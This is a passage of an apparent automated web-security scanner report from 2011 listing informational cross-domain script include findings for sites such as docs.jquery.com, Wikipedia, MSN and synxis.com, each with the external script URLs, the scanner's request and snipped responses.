   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

18.120. http://docs.jquery.com/UI/Datepicker previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.jquery.com
Path:	/UI/Datepicker

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Datepicker HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:32:26 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 31 Jan 2011 21:54:34 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 95300

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

18.121. http://docs.jquery.com/UI/Effects/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.jquery.com
Path:	/UI/Effects/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Effects/ HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:32:27 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 31 Jan 2011 21:54:34 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

18.122. http://ehough.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ehough.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.3/jquery-ui.min.js

Request

GET / HTTP/1.1
Host: ehough.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 16:18:49 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_fastcgi/2.4.6 Phusion_Passenger/2.2.5
X-Powered-By: PHP/5.2.14
X-Pingback: http://ehough.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head profile=
...[SNIP]...
<link rel='stylesheet' id='contact-form-7-css' href='http://ehough.com/wp-content/plugins/contact-form-7/styles.css?ver=2.4.3' type='text/css' media='all' />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.3/jquery-ui.min.js'></script>
...[SNIP]...

18.123. http://en.wikipedia.org/wiki/Cross-site_scripting previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://en.wikipedia.org
Path:	/wiki/Cross-site_scripting

Issue detail

The response dynamically includes the following scripts from other domains:

http://bits.wikimedia.org/skins-1.5/common/ajax.js?283-19
http://bits.wikimedia.org/skins-1.5/common/jquery.min.js?283-19
http://bits.wikimedia.org/skins-1.5/common/mwsuggest.js?283-19
http://bits.wikimedia.org/skins-1.5/common/wikibits.js?283-19
http://bits.wikimedia.org/w/extensions/UsabilityInitiative/Vector/Vector.combined.min.js?283-19
http://bits.wikimedia.org/w/extensions/UsabilityInitiative/js/plugins.combined.min.js?283-19
http://bits.wikimedia.org/w/extensions/WikimediaMobile/MobileRedirect.js?2.2
http://geoiplookup.wikimedia.org/

Request

GET /wiki/Cross-site_scripting HTTP/1.1
Host: en.wikipedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 22:15:10 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
Content-Language: en
Vary: Accept-Encoding,Cookie
Last-Modified: Wed, 26 Jan 2011 16:20:42 GMT
Content-Length: 100283
Content-Type: text/html; charset=UTF-8
Age: 33343
X-Cache: HIT from sq65.wikimedia.org
X-Cache-Lookup: HIT from sq65.wikimedia.org:3128
X-Cache: MISS from sq63.wikimedia.org
X-Cache-Lookup: MISS from sq63.wikimedia.org:80
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
<head>
<title>
...[SNIP]...
</script><script src="http://bits.wikimedia.org/skins-1.5/common/wikibits.js?283-19" type="text/javascript"></script>
<script type="text/javascript" src="http://bits.wikimedia.org/skins-1.5/common/jquery.min.js?283-19"></script>
<script src="http://bits.wikimedia.org/skins-1.5/common/ajax.js?283-19" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/skins-1.5/common/mwsuggest.js?283-19" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/w/extensions/WikimediaMobile/MobileRedirect.js?2.2" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/w/extensions/UsabilityInitiative/js/plugins.combined.min.js?283-19" type="text/javascript"></script>
<script src="http://bits.wikimedia.org/w/extensions/UsabilityInitiative/Vector/Vector.combined.min.js?283-19" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://geoiplookup.wikimedia.org/"></script>
...[SNIP]...

18.124. http://entertainment.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://entertainment.msn.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://help.live.com/resources/neutral/launchhelp.js

Request

GET / HTTP/1.1
Host: entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 53147
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=b39c3a5d929f4c56b9f0ed54cc0437f4; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 15:32:30 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Celebrity
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

18.125. http://entertainment.msn.com/news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://entertainment.msn.com
Path:	/news/

Issue detail

The response dynamically includes the following scripts from other domains:

http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://help.live.com/resources/neutral/launchhelp.js

Request

GET /news/ HTTP/1.1
Host: entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 62010
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=5ee08328c5854a91b8ceda54850cba49; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 15:32:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Just In Ne
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

18.126. http://entertainment.msn.com/video/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://entertainment.msn.com
Path:	/video/

Issue detail

The response dynamically includes the following scripts from other domains:

http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://help.live.com/resources/neutral/launchhelp.js
http://img1.video.s-msn.com/v/js/MsnVideoUx_Min.js

Request

GET /video/ HTTP/1.1
Host: entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 26701
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=ab9a494b3ce24782ad4af7e40153d000; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 15:32:31 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
MSN Entert
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<td valign="top"><SCRIPT type=text/javascript src="http://img1.video.s-msn.com/v/js/MsnVideoUx_Min.js"></SCRIPT>
...[SNIP]...
<script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

18.127. https://faq.orbitz.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://faq.orbitz.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

https://sales.liveperson.net/hc/71215175/?cmd=mTagRepstate&site=71215175&buttonID=15&divID=lpButDivID-1286912451&bt=1&c=1

Request

GET / HTTP/1.1
Host: faq.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.128. http://fitbie.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET / HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
Last-Modified: Tue, 01 Feb 2011 12:23:26 +0000
ETag: "1296563006"
Content-Type: text/html; charset=utf-8
Date: Tue, 01 Feb 2011 15:32:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

18.129. http://fitbie.msn.com/lose-weight/tips/reasons-youre-destined-weight-loss-success previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/lose-weight/tips/reasons-youre-destined-weight-loss-success

Issue detail

The response dynamically includes the following script from another domain:

http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /lose-weight/tips/reasons-youre-destined-weight-loss-success HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Tue, 01 Feb 2011 15:32:41 +0000
ETag: "1296574361-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=43200
Expires: Wed, 02 Feb 2011 03:32:42 GMT
Date: Tue, 01 Feb 2011 15:32:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 79722

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

18.130. http://forums.plentyoffish.com/datingposts6866122.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.plentyoffish.com
Path:	/datingposts6866122.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /datingposts6866122.aspx HTTP/1.1
Host: forums.plentyoffish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 14:32:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=bg3rbh553e25qi2e2vfojbvv; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39952

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>
           Login Issues. Free Dating, Singles and Personals </title>
               <META name="description" content="1.
...[SNIP]...
</TABLE>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.131. http://games.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://games.msn.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://az13127.vo.msecnd.net/anaheim-6/scripts/common/common.min.js
http://az13127.vo.msecnd.net/anaheim-6/scripts/common/fasttrack.min.js
http://az13127.vo.msecnd.net/anaheim-6/scripts/common/friendcache.min.js
http://az13127.vo.msecnd.net/anaheim-6/scripts/common/gamecache.min.js
http://az13127.vo.msecnd.net/anaheim-6/scripts/common/gb.min.js
http://az13127.vo.msecnd.net/anaheim-6/scripts/common/invitefriend.min.js
http://az13127.vo.msecnd.net/anaheim-6/scripts/common/jquery-1.4.2.min.js
http://az13127.vo.msecnd.net/anaheim-6/scripts/common/jquery-ui-1.8.1.custom.min.js
http://az13127.vo.msecnd.net/anaheim-6/scripts/common/jquery.jscrollpane-1.2.3.min.js
http://az13127.vo.msecnd.net/anaheim-6/scripts/common/jquery.mousewheel-3.0.2.min.js
http://az13127.vo.msecnd.net/anaheim-6/scripts/common/jqueryui-plugin/js/jquery.ui.core.min.js
http://az13127.vo.msecnd.net/anaheim-6/scripts/common/jqueryui-plugin/js/jquery.ui.fbfeedformat.min.js
http://az13127.vo.msecnd.net/anaheim-6/scripts/common/jqueryui-plugin/js/jquery.ui.widget.min.js
http://az13127.vo.msecnd.net/anaheim-6/scripts/common/json2.min.js
http://az13127.vo.msecnd.net/anaheim-6/scripts/header.min.js
http://az13127.vo.msecnd.net/anaheim-6/scripts/omniture/s_auxiliary.min.js
http://az13127.vo.msecnd.net/anaheim-6/scripts/omniture/s_code.min.js
http://az13127.vo.msecnd.net/anaheim-6/scripts/profilepage.min.js
http://az13127.vo.msecnd.net/anaheim-6/scripts/site.master.min.js

Request

GET / HTTP/1.1
Host: games.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-WR-L: 87,NC
Set-Cookie: MSGmSession=RUID=f56e2aa94ee94cd4a6048f2d7643f670&Env=AP2; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 15:33:00 GMT
Connection: close
Content-Length: 45429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta http-equiv=
...[SNIP]...
</style><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/gamecache.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/jquery-1.4.2.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/jquery-ui-1.8.1.custom.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/jquery.mousewheel-3.0.2.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/jquery.jscrollpane-1.2.3.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/jqueryui-plugin/js/jquery.ui.core.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/jqueryui-plugin/js/jquery.ui.widget.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/jqueryui-plugin/js/jquery.ui.fbfeedformat.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/profilepage.min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/invitefriend.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/json2.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/gb.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/common.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/friendcache.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/header.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/site.master.min.js" type="text/javascript"></script><script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/common/fasttrack.min.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/omniture/s_code.min.js" type="text/javascript"></script>
<script src="http://az13127.vo.msecnd.net/anaheim-6/scripts/omniture/s_auxiliary.min.js" type="text/javascript"></script>
...[SNIP]...

18.132. https://gc.synxis.com/rez.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://gc.synxis.com
Path:	/rez.aspx

Issue detail

The response dynamically includes the following script from another domain:

https://seal.verisign.com/getseal?host_name=gc.synxis.com&size=M&use_flash=YES&use_transparent=YES&lang=en

Request

Response

18.133. https://gc.synxis.com/xbe/rez.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://gc.synxis.com
Path:	/xbe/rez.aspx

Issue detail

The response dynamically includes the following script from another domain:

https://seal.verisign.com/getseal?host_name=gc.synxis.com&size=M&use_flash=YES&use_transparent=YES&lang=en

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Tue, 01 Feb 2011 15:33:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 278255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
...[SNIP]...
</div>

<script src="https://seal.verisign.com/getseal?host_name=gc.synxis.com&size=M&use_flash=YES&use_transparent=YES&lang=en"></script>
...[SNIP]...

18.134. https://gc.synxis.com/xbe/rez.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://gc.synxis.com
Path:	/xbe/rez.aspx

Issue detail

The response dynamically includes the following script from another domain:

https://siteseal.thawte.com/cgi/server/thawte_seal_generator.exe

Request

GET /xbe/rez.aspx?Chain=5303&start=1&hotel=11536&arrive=02%2F01%2F2011&nights=1&adult=1&child=0&rooms=1&group=&promo=ushoyt&iata=&step=2&mboxSession=1296573995979-796819 HTTP/1.1
Host: gc.synxis.com
Connection: keep-alive
Referer: http://www.millenniumhotels.com/millenniumboston/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

18.135. http://glo.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://glo.msn.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://amch.questionmarket.com/adsc/d832529/3/847182/randm.js
http://amch.questionmarket.com/adsc/d840549/12/842134/randm.js
http://static.glo.com/cache/js/1293231430/b21uaXR1cmUuanM..js
http://static.glo.com/cache/js/1293231430/c2lmci5qcw...js
http://yui.yahooapis.com/3.1.1/build/yui/yui-min.js

Request

GET / HTTP/1.1
Host: glo.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 01 Feb 2011 15:33:56 GMT
Expires:
Pragma:
Cache-Control: public
Cache-Control: max-age=300
Vary: Accept-Encoding
Content-Type: text/html
X-Cache-Lookup: HIT from localhost:8080
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="template" xmlns:fb=
...[SNIP]...
<meta property="og:image" content="http://static.glo.com/photos/ThumbNail/28259_ThumbNail.jpg" />

<script src="http://static.glo.com/cache/js/1293231430/c2lmci5qcw...js"></script>
<script src="http://yui.yahooapis.com/3.1.1/build/yui/yui-min.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d832529/3/847182/randm.js"></script>
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d840549/12/842134/randm.js"></script>
...[SNIP]...
</div>

<script src="http://static.glo.com/cache/js/1293231430/b21uaXR1cmUuanM..js"></script>
...[SNIP]...

18.136. http://glo.msn.com/living/celebrity-home-collections-6350.gallery previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://glo.msn.com
Path:	/living/celebrity-home-collections-6350.gallery

Issue detail

The response dynamically includes the following scripts from other domains:

http://amch.questionmarket.com/adsc/d832529/3/847182/randm.js
http://amch.questionmarket.com/adsc/d840549/12/842134/randm.js
http://static.glo.com/cache/js/1293231430/b21uaXR1cmUuanM..js
http://static.glo.com/cache/js/1293231430/c2lmci5qcw...js
http://yui.yahooapis.com/3.1.1/build/yui/yui-min.js

Request

GET /living/celebrity-home-collections-6350.gallery HTTP/1.1
Host: glo.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 01 Feb 2011 15:34:03 GMT
Expires:
Pragma:
Cache-Control: public
Cache-Control: max-age=300
Vary: Accept-Encoding
Content-Type: text/html
X-Cache-Lookup: HIT from localhost:8080
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="template" xmlns:fb=
...[SNIP]...
<meta property="og:image" content="http://static.glo.com/photos/ImageModule70x75/26984_ImageModule70x75.jpg" />

<script src="http://static.glo.com/cache/js/1293231430/c2lmci5qcw...js"></script>
<script src="http://yui.yahooapis.com/3.1.1/build/yui/yui-min.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d832529/3/847182/randm.js"></script>
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d840549/12/842134/randm.js"></script>
...[SNIP]...
</div>

<script src="http://static.glo.com/cache/js/1293231430/b21uaXR1cmUuanM..js"></script>
...[SNIP]...

18.137. http://gocitykids.parentsconnect.com/data/service-calendar.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gocitykids.parentsconnect.com
Path:	/data/service-calendar.json

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js
http://connect.facebook.net/en_US/all.js
http://widgets3.flux.com/Loader
http://yui.yahooapis.com/2.5.1/build/animation/animation-min.js
http://yui.yahooapis.com/2.5.1/build/autocomplete/autocomplete-min.js
http://yui.yahooapis.com/2.5.1/build/calendar/calendar-min.js
http://yui.yahooapis.com/2.5.1/build/connection/connection-min.js
http://yui.yahooapis.com/2.5.1/build/container/container-min.js
http://yui.yahooapis.com/2.5.1/build/cookie/cookie-beta-min.js
http://yui.yahooapis.com/2.5.1/build/dom/dom-min.js
http://yui.yahooapis.com/2.5.1/build/event/event-min.js
http://yui.yahooapis.com/2.5.1/build/json/json-min.js
http://yui.yahooapis.com/2.5.1/build/treeview/treeview-min.js
http://yui.yahooapis.com/2.5.1/build/yahoo-dom-event/yahoo-dom-event.js
http://yui.yahooapis.com/2.5.1/build/yahoo/yahoo-min.js

Request

GET /data/service-calendar.json HTTP/1.1
Host: gocitykids.parentsconnect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Content-Type: text/html;charset=UTF-8
Date: Wed, 02 Feb 2011 19:20:46 GMT
Connection: close
Content-Length: 86778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html><head><link type="image/x-icon" href="http://gocitykids.parentsconnect.com:80/favicon.ico"
...[SNIP]...
